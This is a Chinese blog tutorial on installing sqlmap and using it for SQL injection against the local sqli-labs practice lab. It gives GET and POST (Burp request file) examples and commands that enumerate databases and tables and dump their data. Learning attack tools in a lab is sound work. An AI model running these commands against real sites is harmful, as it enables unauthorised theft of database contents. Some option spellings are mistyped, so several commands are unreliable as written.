day9-sql注入之sqlmap工具使用

最新推荐文章于 2026-05-22 11:16:16 发布
原创 最新推荐文章于 2026-05-22 11:16:16 发布 · 1.1k 阅读 · 29 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#sql #数据库 #mysql #网络安全 #web安全

学习目标:

本期我们来了解一下sql注入的工具–sqlmap,在平常的注入的过程中我们可以体会到采用手工注入耗时耗力,所以sqlmap就给我们来了极大的便利

学习内容:

  1. 搭建 sqlmap环境
  2. sqlmap使用
  3. POST型注入
  4. GET 型注入

搭建环境

要使用sqlmap我们就要配置python的环境
1.1 下载 Python 安装程序
访问 Python 官方网站:python.org
下载适用于 Windows 的 Python 3 安装程序。通常会有两个版本:32 位和 64 位。您需要根据您的系统选择合适的版本。
1.2 安装 Python
双击下载的安装程序。
在安装向导中,确保选中“Add Python 3.x to PATH”选项。
点击“Install Now”或“Customize installation”根据需要进行安装。
————————————————

                        版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

原文链接:https://blog.csdn.net/xyq2024/article/details/142968458
sqlmap下载
下载目录:https://github.com/sqlmapproject/sqlmap
下载之后进行解压
在这里插入图片描述
在这个地方输入cmd
然后输入

python sqlmap.py

在这里插入图片描述
出现这个说明工具启用成功了,

sqlmap使用

-u:用于get提交方式,后面跟注入的url网址
–level
–risk

–dbs:获取所有数据库
–tales:获取所有数据表
–columns:获取所有字段
–dump:打印数据

-D:查询选择某个库
-T:查询选择某个表
-C:查询选择某个字段

GET型

下面就是工具如何使用了,首先是get型,我们以sqli-labs的第二关为例
复制第二关的网址,然后在sqlmap中输入

python sqlmap.py -u "http://localhost/sqli-labs-php7-master/Less-2/?id=1"

就可以去判断这个网站可以用什么类型的注入方式,第一次被注入的网站会询问几个问题我都整理下来了
1.it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? [Y/n]
它看起来像后端DBMS是’MySQL’。 是否要跳过特定于其他DBMS的测试负载? [Y/n] 输入"Y"

2.for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1) values? [Y/n]
对于剩余的测试,您想要包括所有针对“MySQL”扩展提供的级别(1)和风险(1)值的测试吗? [Y/n] 输入"N"

3.POST parameter ‘n’ is vulnerable. Do you want to keep testing the others (if any)? [y/N]
POST参数’n’是脆弱的。 你想继续测试其他人(如果有的话)吗?[y/N] 输入"Y"
我们看情况进行输入
请添加图片描述
这里就是使用工具后可以看到第二关可以采用四种方式进行注入布尔,报错回显,延时,联合查询。
至于其中的level和risk我找了一下介绍

	level:执行测试的等级(1~5,默认为1),使用-level参数并且数值>=2的时候会检查cookie里面的参数,
当>=3时检查user-agent和refereer
      risk:执行测试的风险(0~3,默认为1),默认是1会测试大部分的测试语句,2会增加基于事件的测试语句,
3会增加or语句的sql注入

python sqlmap.py -u "http://localhost/sqli-labs-php7-master/Less-2/?id=1"  --dbs  获取全部库名
python sqlmap.py -u "http://localhost/sqli-labs-php7-master/Less-2/?id=1"  -D 库名 --tables  查询某库中的全部表
python sqlmap.py -u "http://localhost/sqli-labs-php7-master/Less-2/?id=1" -D 库名 -T 表明 -columns  查询某库某表的字段
python sqlmap.py -u "http://localhost/sqli-labs-php7-master/Less-2/?id=1"  -D 库名 -T 表明 -C 字段名 --dump 打印出数据
python sqlmap.py -u "http://localhost/sqli-labs-php7-master/Less-2/?id=1"  --current -db 获取当前数据库名
--dump是打印用的,使用后会出现打印的路径

POST型

post型我们需要burp进行抓包,我们以12关为例子
输入数据后我们进行抓包
请添加图片描述
将这些数据复制保存到一个txt文本文档中,
然后在工具中输入

python sqlmap.py -r C:\Users\alter\Desktop\1.txt
这里我是保存到了桌面上,命名是1.txt

这里的操作和get型类似,但是有个专门对某参数进行注入的命令,适用于我们猜到这里是注入点,可以节省我们大量时间

python sqlmap.py -r C:\Users\alter\Desktop\1.txt -p uname --dbs
比如这个地方我们猜测uname是注入点我们就可以这样输入,同样会显示给我们有什么注入方法

请添加图片描述
剩下的就是去猜表,猜一些字段,就用的跟上面的一样了

总结

其实没啥好总结的,用法就是这么个用法,还是得多练,over

渗透常用工具-SQLMap
beirry的博客
05-08 1374
sqlmap 是用python编写的渗透测试工具,可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。通常检测到存在sql注入点时,就可以利用此工具来进行验证。 下载使用 SQLMap下载地址:https://sqlmap.org/#download Python下载地址:https://www.python.org/downloads/ 根据以上下载地址来获取安装包 SQLmapPython: 下载完后安装即可使用使用方法 打开sqlmap所在目录,打开命令行。 在命令行中输入pyt
day27WEB攻防-通用漏洞&SQL注入&常见SQL注入类型&Tamper脚本的使用
m0_69583059的博客
01-18 1758
如果在实战中我们遇到了这样的问题应该如何解决,这里我们可以采用宽字节绕过,就是借助一些繁体字符或者乱码字符来占用字节位数,从而尝试绕过,例如,如果对单引号'进行了转义,我们可以通过在单引号前面加上%df来占用转义符号,没有了转义字符传入的数据就是正常的了。开发程序里面,数字不需要单引号,字符需要单引号,双引号去概括的,在注入的时候,需要考虑到符号的闭合,才能正确去执行SQL,完成注入。在注入的过程中,会遇到一些复杂的注入(waf绕过,过滤,编码等),tamper脚本可以尝试绕过。
PythonSQLMap:自动SQL注入和渗透测试工具示例详解
naer_chongya的博客
07-20 2533
网络安全领域中,渗透测试是一项重要的任务。其中,SQL注入攻击是最常见的一种攻击方式之一。为了简化渗透测试过程中的繁琐操作,开发者们设计了各种自动化工具。其中,SQLMap是一款使用Python编写的强大工具,用于进行自动化的SQL注入和渗透测试。本文将详细介绍SQLMap使用方法,包括Python语言环境的搭建、SQLMap的安装和配置、基本使用方法以及具体示例,以帮助读者更好地理解和运用这一强大的工具
Python自动化SQL注入数据库取证工具库之sqlmap使用详解
Rocky006的博客
05-14 1123
概要 在网络安全领域,SQL注入仍然是最常见的攻击之一。sqlmap是一个开源的自动化SQL注入数据库取证工具,它提供了广泛的功能来检测和利用SQL注入漏洞。本文将详细介绍sqlmap的安装、特性、基本与高级功能,并结合实际应用场景,展示其在网络安全测试中的应用。
SQLmap Python环境配置避坑指南:从启动失败到稳定运行
最新发布
weixin_33462927的博客
05-22 557
SQLmap作为主流SQL注入自动化工具,其本质是依赖特定Python运行时的命令行渗透框架。理解Python解释器版本兼容性、第三方库(如requests、urllib3)的精确版本约束、以及系统级PATH与site-packages路径对齐原理,是解决‘Python not recognized’‘No module named requests’等高频问题的技术基础。这类环境配置问题直接影响渗透测试效率,常见于CTF实战、Web安全初学者搭建靶场、以及甲方授权渗透中的工具初始化阶段。本文聚焦SQLma
sqlmap工具使用 (超详细附工具版)
读书 买花 长大
06-11 4081
sqlmap
安全测试必备工具——SQLMap 安装及基本应用
朱雀随云记的博客
04-30 1457
输入:python sqlmap.py -u http://192.168.253.137/vulnerabilities/sqli/?3、进入解压后的目录,在显示目录路径位置输入cmd回车,在弹出的命令行窗口,输入 python sqlmap.py即开启工具使用。运行过程中需要用户输入y/n才能进入下一步操作,如果希望跳过这些,可以在命令末尾加 --batch。2、将下载好的sqlmap-master.zip压缩包,解压到自己需要的目录。--current-db:获取当前数据库
day26WEB攻防-通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2等
m0_69583059的博客
01-16 1453
sqlmap 是一个开源渗透测试工具,可自动检测和利用 SQL 注入缺陷并接管数据库服务器的过程。它配备了强大的检测引擎、用于终极渗透测试仪的许多利基功能以及从数据库指纹识别、从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令的各种切换。
day5 --- 一篇文章入门sql注入
qq_61883924的博客
08-31 2258
总结SQL注入原理、SQL注入常用函数及含义,SQL注入防御手段,SQL注入常用绕过waf的方法, sqli-labs通关前5关, 常用的相关函数及其拓展,sqlmap常用命令
SQL相关知识 & CTF SQL注入做题方法总结
绘梨衣の沉默的博客。主要是CTF竞赛,网络安全,渗透测试,HVV,以及学习到的各种知识的分享
08-30 1058
本文介绍了MySQL数据库的基础操作和SQL注入技术。内容涵盖MySQL基本查询命令、数据库信息查看方法,以及SQL注入原理与常见类型,包括数字型/字符型注入、联合查询、布尔盲注、时间盲注、报错注入和堆叠注入等攻击方式。文中详细阐述了各种注入技术的判断方法和利用脚本,如使用extractvalue()、updatexml()等函数进行报错注入,以及如何通过时间延迟实现盲注。最后介绍了SQLmap工具使用方法,包括数据库枚举、表名获取和字段爆破等自动化渗透测试技术。
SQL盲注之python脚本爆破及sqlmap基础操作
wangringyi的博客
04-09 6489
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、SQL盲注是什么? 二、介绍与使用 1.盲注的三种分类 2.基于报错的盲注 3.基于时间的脚本化盲注 sqlmap使用 前言 哈,我是爱挖洞的萝卜头,从今天开始来csdn分享学习过过程,学习经历,望各位大佬指教指教,嘿嘿嘿。 一、SQL盲注是什么? 经历过前面的数字型注入,字符型注入,提交方式注入等,我们对sql注入有了基本的...
sqlmap工具使用 (超详细附工具版)_python sqlmap
m0_61408947的博客
04-12 1515
python sqlmap.py -u “http://x.x.x.x/” --data=uname=admin&passwd=admin&submit=Submit -D “库名” -T “表名” -C “字段名” --dump。python sqlmap.py -u “http://x.x.x.x/” --data=uname=admin&passwd=admin&submit=Submit -D “库名” -T “表名” --columns。id=1*” -D “库名” --tables。
python+sqlmap
weixin_45139674的博客
10-24 395
python+sqlmap
SQLMAP使用
qq_63484934的博客
12-29 1897
id=1” --batch -D security --dump (直接对库进行Dump)user-agent 有一个文件 E:\python\sqlmap\data\txt\user-agents.txt’这里注意对库直接进行–dump,要看他是不是时间注入,有选择的–dump。8.看他的payload怎么写的,详细的显示payload。直接替换,查表名,库名,字段名。
sqlmap工具学习记
m0_70483044的博客
07-20 820
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。Sqlmap的强大的功能包括 数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时执行任意命令。是sql注入方面一个强大的工具!...
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本)
热门推荐
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
sqlmap工具使用 (超详细附工具版)_python sqlmap,2024年最新【面试必会】
m0_60607675的博客
04-18 919
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了,只是里面的项目比较多,水平也是参差不齐,大家可以挑自己能做的项目去练练。我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了,只是里面的项目比较多,水平也是参差不齐,大家可以挑自己能做的项目去练练。(img-z9yWr7eA-1713388725462)]最近我才对这些路线做了一下新的更新,知识体系更全面了。
网络安全学习笔记——SalMap爆破&添加快捷方式
just do it
08-05 825
python在cmd显示不是内部或外部命令,以及python貌似正常,但是pip不正常时——在系统变量里重新设置或添加path变量,添加内容为python的安装路径,精确到.ex。sqlmap损坏时,在官网重新下载一个文件,放到电脑里,根据。
sqlmap及其python依赖环境的安装
yk2909438315的博客
04-08 3178
由于环境的不同,安装过程中可能会遇到各种各样的问题,不用慌,先根据错误提示搜索,多试一下。因为sqlmap是用python语言编写的,所以需要先安装python环境。因为只能在sqlmap目录下使用命令,为了方便在任何地方使用,添加环境变量。只需要双击这个快捷方式,就可以进入sqlmap路径使用sqlmap命令。这时候就可以在任何地方使用sqlmap命令,也不需要带py后缀了。如果sqlmap.py不行,就用python sqlmap.py。如果是win10,编辑Path的时候是新建变量,不需要分号分隔。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值